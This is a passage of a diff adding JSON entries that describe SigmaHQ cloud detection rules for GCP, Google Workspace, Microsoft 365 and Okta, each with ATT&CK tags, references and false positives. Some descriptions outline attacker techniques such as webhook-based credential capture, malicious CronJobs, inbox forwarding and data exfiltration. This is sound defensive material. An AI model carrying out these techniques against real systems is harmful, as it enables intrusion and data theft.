"https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2021/08/13", + "filename": "gcp_firewall_rule_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.", + "Exceptions can be added to this rule to filter expected behavior." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", + "uuid": "980a7598-1e7f-4962-9372-2d754c930d0e", + "value": "Google Full Network Traffic Packet Capture", + "meta": { + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074" + ], + "creation_date": "2021/08/13", + "filename": "gcp_full_network_traffic_packet_capture.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Full Network Packet Capture may be done by a system or network administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when an admission controller is executed in GCP Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", + "uuid": "6ad91e31-53df-4826-bd27-0166171c8040", + "value": "Google Cloud Kubernetes Admission Controller", + "meta": { + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_admission_controller.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1078", + "attack.credential_access", + "attack.t1552", + "attack.t1552.007" + ], + "creation_date": "2021/11/25", + "filename": "gcp_kubernetes_admission_controller.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Google Cloud Kubernetes Admission Controller may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. 
Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "uuid": "cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", + "value": "Google Cloud Kubernetes CronJob", + "meta": { + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs", + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.execution" + ], + "creation_date": "2021/11/22", + "filename": "gcp_kubernetes_cronjob.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Google Cloud Kubernetes CronJob/Job may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Detects the creation or patching of potential malicious RoleBinding. 
This includes RoleBindings and ClusterRoleBinding.", + "uuid": "0322d9f2-289a-47c2-b5e1-b63c90901a3e", + "value": "Google Cloud Kubernetes RoleBinding", + "meta": { + "refs": [ + "https://github.com/elastic/detection-rules/pull/1267", + "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", + "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", + "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml" + ], + "tags": [ + "attack.credential_access" + ], + "creation_date": "2021/08/09", + "filename": "gcp_kubernetes_rolebinding.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when the Secrets are Modified or Deleted.", + "uuid": "2f0bae2d-bf20-4465-be86-1311addebaa3", + "value": "Google Cloud Kubernetes Secrets Modified or Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml" + ], + "tags": [ + "attack.credential_access" + ], + "creation_date": "2021/08/09", + "filename": "gcp_kubernetes_secrets_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when a service account is disabled or deleted in Google Cloud.", + "uuid": "13f81a90-a69c-4fab-8f07-b5bb55416a9f", + "value": "Google Cloud Service Account Disabled or Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ], + "creation_date": "2021/08/14", + "filename": "gcp_service_account_disabled_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Service Account being disabled or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when a service account is modified in Google Cloud.", + "uuid": "6b67c12e-5e40-47c6-b3b0-1e6b571184cc", + "value": "Google Cloud Service Account Modified", + "meta": { + "refs": [ + "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_modified.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/14", + "filename": "gcp_service_account_modified.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Detect when a Cloud SQL DB has been modified or deleted.", + "uuid": "f346bbd5-2c4e-4789-a221-72de7685090d", + "value": "Google Cloud SQL Database Modified or Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/10/15", + "filename": "gcp_sql_database_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "SQL Database being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.", + "uuid": "99980a85-3a61-43d3-ac0f-b68d6b4797b1", + "value": "Google Cloud VPN Tunnel Modified or Deleted", + "meta": { + "refs": [ + "https://any-api.com/googleapis_com/compute/docs/vpnTunnels", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/16", + "filename": "gcp_vpn_tunnel_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "VPN Tunnel being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "gcp" + } + }, + { + "description": "Detects when an an application is removed from Google Workspace.", + "uuid": "ee2803f0-71c8-4831-b48b-a1fc57601ee4", + "value": "Google Workspace Application Removed", + "meta": { + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/26", + "filename": "gworkspace_application_removed.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Application being removed may be performed by a System Administrator." 
+ ], + "logsource.category": "No established category", + "logsource.product": "google_workspace" + } + }, + { + "description": "Detects when an API access service account is granted domain authority.", + "uuid": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", + "value": "Google Workspace Granted Domain API Access", + "meta": { + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2021/08/23", + "filename": "gworkspace_granted_domain_api_access.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "google_workspace" + } + }, + { + "description": "Detects when multi-factor authentication (MFA) is disabled.", + "uuid": "780601d1-6376-4f2a-884e-b8d45599f78c", + "value": "Google Workspace MFA Disabled", + "meta": { + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/26", + "filename": "gworkspace_mfa_disabled.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "MFA may be disabled and performed by a system administrator." 
+ ], + "logsource.category": "No established category", + "logsource.product": "google_workspace" + } + }, + { + "description": "Detects when an a role is modified or deleted in Google Workspace.", + "uuid": "6aef64e3-60c6-4782-8db3-8448759c714e", + "value": "Google Workspace Role Modified or Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/24", + "filename": "gworkspace_role_modified_or_deleted.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "google_workspace" + } + }, + { + "description": "Detects when an a role privilege is deleted in Google Workspace.", + "uuid": "bf638ef7-4d2d-44bb-a1dc-a238252e6267", + "value": "Google Workspace Role Privilege Deleted", + "meta": { + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/24", + "filename": "gworkspace_role_privilege_deleted.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "google_workspace" + } + }, + { + "description": "Detects when an Google Workspace user is granted admin privileges.", + "uuid": "2d1b83e4-17c6-4896-a37b-29140b40a788", + "value": "Google Workspace User Granted Admin Privileges", + "meta": { + "refs": [ + 
"https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2021/08/23", + "filename": "gworkspace_user_granted_admin_privileges.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Google Workspace admin role privileges, may be modified by system administrators." + ], + "logsource.category": "No established category", + "logsource.product": "google_workspace" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce.\nThis is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.\n", + "uuid": "2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", + "value": "Activity Performed by Terminated User", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/23", + "filename": "microsoft365_activity_by_terminated_user.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP 
address.", + "uuid": "d8b0a4fe-07a8-41be-bd39-b14afa025d95", + "value": "Activity from Anonymous IP Addresses", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ], + "creation_date": "2021/08/23", + "filename": "microsoft365_activity_from_anonymous_ip_addresses.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "User using a VPN or Proxy" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.", + "uuid": "0f2468a2-5055-4212-a368-7321198ee706", + "value": "Activity from Infrequent Country", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ], + "creation_date": "2021/08/23", + "filename": "microsoft365_activity_from_infrequent_country.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.", + 
"uuid": "2b669496-d215-47d8-bd9a-f4a45bf07cda", + "value": "Data Exfiltration to Unsanctioned Apps", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ], + "creation_date": "2021/08/23", + "filename": "microsoft365_data_exfiltration_to_unsanctioned_app.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.\nThese IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.\n", + "uuid": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", + "value": "Activity from Suspicious IP Addresses", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_from_susp_ip_addresses.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ], + "creation_date": "2021/08/23", + "filename": "microsoft365_from_susp_ip_addresses.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.", + "uuid": 
"d7eab125-5f94-43df-8710-795b80fa1189", + "value": "Microsoft 365 - Impossible Travel Activity", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_impossible_travel_activity.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2020/07/06", + "filename": "microsoft365_impossible_travel_activity.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.", + "uuid": "c191e2fa-f9d6-4ccf-82af-4f2aba08359f", + "value": "Logon from a Risky IP Address", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2021/08/23", + "filename": "microsoft365_logon_from_risky_ip_address.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Alert for the addition of a new federated domain.", + "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339", + "value": "New Federated Domain Added", + "meta": { + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", + 
"https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", + "https://www.sygnia.co/golden-saml-advisory", + "https://o365blog.com/post/aadbackdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.003" + ], + "creation_date": "2022/02/08", + "filename": "microsoft365_new_federated_domain_added.yml", + "author": "@ionsor", + "level": "medium", + "falsepositive": [ + "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider." + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.", + "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69", + "value": "Microsoft 365 - Potential Ransomware Activity", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ], + "creation_date": "2021/08/19", + "filename": "microsoft365_potential_ransomware_activity.yml", + "author": "austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Alert on when a user has performed an eDiscovery search or exported a PST file from the search. 
This PST file usually has sensitive information including email body content", + "uuid": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0", + "value": "PST Export Alert Using eDiscovery Alert", + "meta": { + "refs": [ + "https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114" + ], + "creation_date": "2022/02/08", + "filename": "microsoft365_pst_export_alert.yml", + "author": "Sorina Ionescu", + "level": "medium", + "falsepositive": [ + "PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored." + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.", + "uuid": "6897cd82-6664-11ed-9022-0242ac120002", + "value": "PST Export Alert Using New-ComplianceSearchAction", + "meta": { + "refs": [ + "https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114" + ], + "creation_date": "2022/11/17", + "filename": "microsoft365_pst_export_alert_using_new_compliancesearchaction.yml", + "author": "Nikita Khalimonenkov", + "level": "medium", + "falsepositive": [ + "Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored." 
+ ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.", + "uuid": "6c220477-0b5b-4b25-bb90-66183b4089e8", + "value": "Suspicious Inbox Forwarding", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_inbox_forwarding.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ], + "creation_date": "2021/08/22", + "filename": "microsoft365_susp_inbox_forwarding.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.", + "uuid": "ee111937-1fe7-40f0-962a-0eb44d57d174", + "value": "Suspicious OAuth App File Download Activities", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml" + ], + "tags": [ + "attack.exfiltration" + ], + "creation_date": "2021/08/23", + "filename": "microsoft365_susp_oauth_app_file_download_activities.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": 
"m365" + } + }, + { + "description": "Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.", + "uuid": "78a34b67-3c39-4886-8fb4-61c46dc18ecd", + "value": "Microsoft 365 - Unusual Volume of File Deletion", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2021/08/19", + "filename": "microsoft365_unusual_volume_of_file_deletion.yml", + "author": "austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.", + "uuid": "ff246f56-7f24-402a-baca-b86540e3925c", + "value": "Microsoft 365 - User Restricted from Sending Email", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1199" + ], + "creation_date": "2021/08/19", + "filename": "microsoft365_user_restricted_from_sending_email.yml", + "author": "austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "m365" + } + }, + { + "description": "Detects when an the Administrator role is assigned to an user or group.", + "uuid": 
"413d4a81-6c98-4479-9863-014785fd579c", + "value": "Okta Admin Role Assigned to an User or Group", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_admin_role_assigned_to_user_or_group.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Administrator roles could be assigned to users or group by other admin users." + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when a API token is created", + "uuid": "19951c21-229d-4ccb-8774-b993c3ff3c5c", + "value": "Okta API Token Created", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2021/09/12", + "filename": "okta_api_token_created.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when a API Token is revoked.", + "uuid": "cf1dbc6b-6205-41b4-9b88-a83980d2255b", + "value": "Okta API Token Revoked", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_api_token_revoked.yml", + "author": "Austin 
